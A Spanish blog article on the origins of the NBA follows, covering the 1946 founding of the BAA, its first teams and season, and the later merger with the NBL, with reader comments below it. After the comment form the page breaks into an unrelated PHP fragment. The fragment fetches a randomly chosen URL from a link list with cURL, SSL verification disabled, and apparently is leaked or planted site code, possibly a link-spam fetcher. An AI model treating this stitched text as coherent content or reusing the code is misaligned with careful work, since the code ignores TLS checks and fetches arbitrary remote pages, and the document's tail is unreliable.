Los inicios

05 de February de 2010 por Sergio
Artículo 1 de 9 de la serie Historia de la NBA

Como he prometido voy a comenzar a realizar ciertos articulos sobre historia de la NBA. No creo que haya mejor comienzo que los propios inicios de la mejor liga de baloncesto del mundo. Me estoy refiriendo a los preludios de la liga profesional americana y, en particular, a la temporada del año 46-47.

Situémonos en los años anteriores a dicha temporada:

El deporte profesional americano constaba de 3 ligas mayoritarias que acaparaban el mayor interes y gran parte de los fondos destinados al ocio por parte de sus ciudadanos. Hablo, por supuesto, de las ligas de Hockey, Beisbol y Futbol Americano.

El Hockey, a pesar de ser un deporte de gran tirón popular durante aquellos años, fue reducido a apenas 6 equipos (2 canadienses y 4 americanos) durante la II guerra mundial. El béisbol, ese deporte extraño para nosotros los hijos de Europa, vivía una etapa de semidecadencia comparada con la “edad dorada” de dicho deporte en los tiempos de Babe Ruth y los Yankees. La liga de Futbol Americano comenzaba a abrirse paso en el siempre complicado mercado yankee a través de su expansión como deporte universitario en los siempre verdes campus universitarios de la patria de George Washington. Otros deportes que por entonces movían grandes masas de dinero, como el boxeo o las carreras de caballos, se mantenían al margen de las grandes ligas ya fuese por su periodicidad (pocos combates de boxeo despertaban grandes pasiones y estaba lejanos entre si en el tiempo) como por focalizacion local (solo existian tres grandes carreras en EEUU, una de ellas el archiconocido “derby de Kentucky”), aparte de su poca “moral religiosa” en una época en la que la religión era un pilar básico de las sociedad y las apuestas no estaban demasiado bien vistas.

A pesar de ello, el baloncesto era un deporte que, a pesar de su ligera pero constante expansión, tenía cierta mala reputación entre la sociedad y sufría fracasos comerciales continuos dinamitando la confianza de sus principales impulsores. Hubo ciertos intentos de desarrollo real en la década de los años 20 que acabaron ahogándose en la orilla debido a los problemas económicos derivados del crack de 1927. De cualquier modo, la repercusión de cualquier jugador no se extendía mas allá de su localidad o región, derivando en abandono de sus carreras por falta de apoyo económico y reconocimiento social.

Dos fueron las principales razones del “boom” de este deporte en el país de las barras y estrellas:

En primer lugar, las instalaciones necesarias para la realización del deporte inventado por Naismith distaban mucho, en cuanto a costes y espacio, de las del resto de deportes mayoritarios, amén de la posibilidad de jugar tanto en invierno como en verano dentro de dichos recintos. Este factor favoreció la construccion de pistas en la mayoria de centros universitarios (e institutos con cierto poder economico) a lo largo y ancho del pais. Ahora los chavales jóvenes disponían de un deporte para practicar durante todo el año y en el que la distancia entre jugadores destacados y aficionados no era tanta debido a la escasa profesionalización. También cabe destacar que en EEUU el ser deportista profesional podía, en muchos casos, eliminar la obligación servicio militar obligatorio.

En segundo lugar, tras la II guerra mundial, EEUU se convirtió en el primer productor mundo. Las penurias pasadas apenas 20 años antes se convertían en un flujo constante de dinero procedente de paises destruidos de Europa. El enriquecimiento de la sociedad no tardo en notarse en la inversión realizada en deporte. Sin embargo, casi todas las ligas profesionales se desarrollaban en verano, y existía un “vacio deportivo” entre el comienzo de una temporada y el fin de la anterior. ¿Que deporte podría cubrir dicho espacio?

El empujón final vino de la mano de los propietarios de los principales pabellones de las principales ciudades (Boston, Philly, Ny, Toronto, Chicago,….). Aquellos tremendos espacios debían crear muchos mas beneficios de los que entonces producían, hueco que no podía ser cubierto salvo por actos eventuales como conciertos, exposiciones o combates de boxeo.

Cabe destacar que las ideas iniciales vinieron de un editor de deportes del New York Times (Max Kase), el cual se puso en contacto con el entonces propietario de la NHL para comenzar, con una serie de reuniones con el resto de propietarios de recintos deportivos, la organización de una liga y el establecimiento de calendarios que permitiera la sostenibilidad de la misma. Dichos propietarios decidieron crear la primera liga de Baloncesto profesional “sostenible”, la BAA (Basketball Association of America). Me parece oportuno recordar que no fue la primera liga profesional americana de baloncesto, sino que algunas como la American Basketball League o la National Basketball League fueron precursoras, si bien se desarrollaban en pequeños espacios.

El nivel de esta liga inaugural no era, ni mucho menos, el mas alto entre las distintas competiciones baloncestísticas que se desarrollaban a su vez. Equipos como los Baltimore Bullets y los Minneapolis Lakers, equipos que no constaban en la primera liga, ganaron ligas tras su inclusión en la BAA. Por supuesto, equipos independientes como los Globetrotters poseían mucho mejores plantillas como quedo demostrado en varias exhibiciones que realizaron contra equipos procedentes de la primera temporada de la BAA.

Tras la reunión final (que tuvo lugar el 6 de Junio de 1946 en el Commodore Hotel de NY) se estableció la formación de una liga de 11 equipos divididos en dos conferencias en los que cada equipo debería jugar un total de 60 partidos. Desde luego existían excepciones de disponibilidad en algunos pabellones como el MSG de NY, donde no podían ofrecer espacio para 30 partidos como locales a los Knicks, relegándolos en ocasiones a espaciones menores. El primer presidente de la liga fue Maurice Podoloff ( posteriormente nombre por el que sería conocido el mas prestigioso premio de la liga ) que anteriormente había ocupado el mismo cargo en la liga de Hockey. El reconocimiento por parte de los propietarios que existía sobre la figura de Podoloff y su conocimiento sobre leyes y economía fue un factor fundamental para el definitivo asentamiento de la liga entre el público norteamericano.

Los equipos que tomaron parte en esta primera temporada fueron: Chicago Stags, Boston Celtics, Cleveland Rebels, Detroit Falcons, New York Knickerbockers, Philadelphia Warriors, Pittsburgh Ironmen, Providence Steamrollers, St. Louis Bombers, Toronto Huskies y Washington Capitols.

El primer partido tuvo lugar el 1 de Noviembre de 1946 (fecha de inicio de la mayoría de las temporadas a partir de entonces) en el Maple Leaf Gardens de Toronto y enfrentó a los New York Knicks y a los locales Toronto Huskies ante unos 7.090 espectadores. El partido finalizó con un 68-66 y la primera canasta la realizó Ossie Schetman. Los Knicks vencieron en este partido con una rotación de tan solo 8 jugadores.

En primer lugar de la liga regular quedaron los Washington Capitols del mítico Red Auerbach. Sin embargo, fueron los Philadelphia Warriors, de la mano de Joe Fulks, los que terminarían llevándose el “gato al agua” al vencer por 4-1 a los Chicago Stags. Joe Fulks también se proclamó máximo anotador de la liga con un promedio de 23,2 puntos por partido. Es destacable que el líder en porcentaje de tiro durante aquella primera temporada fue Bob Feerick con un (actualmente) irrisorio 40,1%. Estos dos jugadores, junto a Max Zaslofsky, Bones McKinney y Stan Miasek completaron el quinteto ideal de la liga.

Tras esta primera temporada, la BAA decidió fusionarse con la entonces mas desarrollada NBL para crear la actual NBA, consiguiendo un total de 17 franquicias casi todas localizadas en los principales focos urbanos estadounidenses. Dicho movimiento eliminó parte de la problemática relacionada con la preferencia de los jugadores profesionales hacía una liga con 10 años de antigüedad respecto a la recién creada competición. Desde luego era un pacto lógico entre dos ligas rivales, donde una ponía las estrellas y la otra los pabellones y, por tanto, el mercado. Digamos que… “estaban destinadas a entenderse”.

Lo demás….., es historia. Una historia que iremos contando.

Comenta

15 comentarios a esta entrada

  1. Txusma dice:
    #1

    Plas, plas, plas… (Léase como si fueran aplausos)
    No tenía ni idea de la mayoría de cosas que se comentan en el artículo. Lo negativo, que no habrá manera de hacer más preguntas de Trivial con este nivel de detalle. Vaya crack, este Sergio!

      Citar

  2. rojorob dice:
    #2

    Podríais añadir la opción de “Me gusta” como en facebook.

      Citar

  3. Vader dice:
    #3

    Muy bueno, muy interesante. Seguiré estos artículos con mucho interes! Gracias!!!

      Citar

  4. Kantonyo dice:
    #4

    Vaya nivelazo Sergio!!! Va a ser todo un lujo aprender la historia de la NBA contigo. Para entender este deporte es vital conocer como ha sido su desarrollo a lo largo de los años.

      Citar

  5. Kantonyo dice:
    #5

    Por cierto me ha sorprendido lo de que el primer partido de la NBA, cuando aún se llamaba BAA se disputará en Toronto, fuera de EEUU. Hace unos días vi a los Raptors con camisetas de los Huskies, y pensé que era algún homenaje de algún equipo de la ABA o algo así… Pensaba que lo de los equipos canadiense en la NBA fue una idea original de los años 90.

      Citar

  6. Dantley2 dice:
    #6

    Toronto Huskies, tremendo

    Articulazo ¡¡¡¡

      Citar

  7. sergio dice:
    #7

    Vaya… me alegro que os guste. Creia que seria un buen comienzo empezar por aqui. Ya ire sumando articulos a la coleccion…. solo hacen falta ideas sobre las que hacerlos.. y admito sugerencias eeee

      Citar

  8. sergio dice:
    #8

    Kantonyo yo tambien recuerdo a Calderon con una camiseta Hardwood Classics pero si no recuerdo mal era verde… Desde luego Canada no ha aparecido muchas veces en la historia del baloncesto pero siempre que aparece es para hacer historia… empezando porque Naismith era canadiense claro…

      Citar

  9. TheDeerHunter dice:
    #9

    Y tanto que nos gustan. Pedazo de fichajes y pedazo de “debut”. El nivel del blog ha crecido un potosí con vosotros en él.

    Conocía a Max Zalofski… de oídas, cómo no, a raíz aquel trivial sobre el draft de Bob Cousy. Ni papa del tal Joe Fulks… impresionante la foto.
    También siempre se comenta que aquella época era de dinosarios y tal… pero por ahí ya estaba dando guerra Red Auerbach. Creo que un pilar fundamental para la super-profesionalización de la liga… y que conocemos todos.

    Recordaba que los Knicks y los Celtics son los únicos equipos originales de la liga (más los Knicks que los Celtics, por aquello del Madison) pero no recordaba que había un equipo fundador canadiense. Creí haber oído que los primeros equipos habían sido los Grizzlies y los Raptors, así lo entendí cuando aparecieron. De lo que se entera uno… este Sergio es un fiera.

    Esperaremos ansiosos la próxima entrega. Mira que a mí me gustan estas cosas.

      Citar

  10. TheDeerHunter dice:
    #10

    Juer… yo también pensaba que lo de los Huskies era un homenaje a algún equipo de la NCAA.

      Citar

  11. Viva_Dirk dice:
    #11

    Tremendo artículo Sergio, das datos como si hubieses estado allí.

    Mis felicitaciones mas sinceras!

      Citar

  12. sergio dice:
    #12

    Pues casi casi estaba… por 40 años y 5.000 km. El siguiente es de los equipos que han ido desapareciendo de la liga… espero que tambien os guste…

      Citar

  13. sergio dice:
    #13

    Deer, de hecho los Grizzlies y los Raptors fueron las primeras franquicias de la NBA propiamente hablando. La NBA nace mas tarde uniendo la BAA y la NBL. Pero la competicion era ciertamente la misma si comparamos la BAA y la NBA: mismos organizadores, equipos, directores, inversores,… todo. Por eso se considera NBA a todos los efectos.

      Citar

  14. Love Denise dice:
    #14

    enhorabuena por el articulo sergio, narra muchisimos datos interesantes de los cuales la mayoría no conocía. Bonita seción.

      Citar

  15. The Big Dipper dice:
    #15

    ¡Gran artículo! Siempre tuve interés por los inicios de la liga que tanto me gusta. Es genial cómo lo explicas, y sobre todo las fotos. Conseguir los logos de la BAA o de los Warriors (cuando estaban en Philadelphia) no está mal, pero… ¡de dónde sacaste el anuncio del primer partido HUSKIES-KNICKS? Ya había oído hablar de los Rebels, de Chicago Stags, de los Washington Capitols, e incluso tengo alguna foto (en blanco y negro, como no) en un libro de Providence Steamrollers, pero lo tuyo está a un gran nivel…
    ¡Vale la pena seguir tus entradas!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>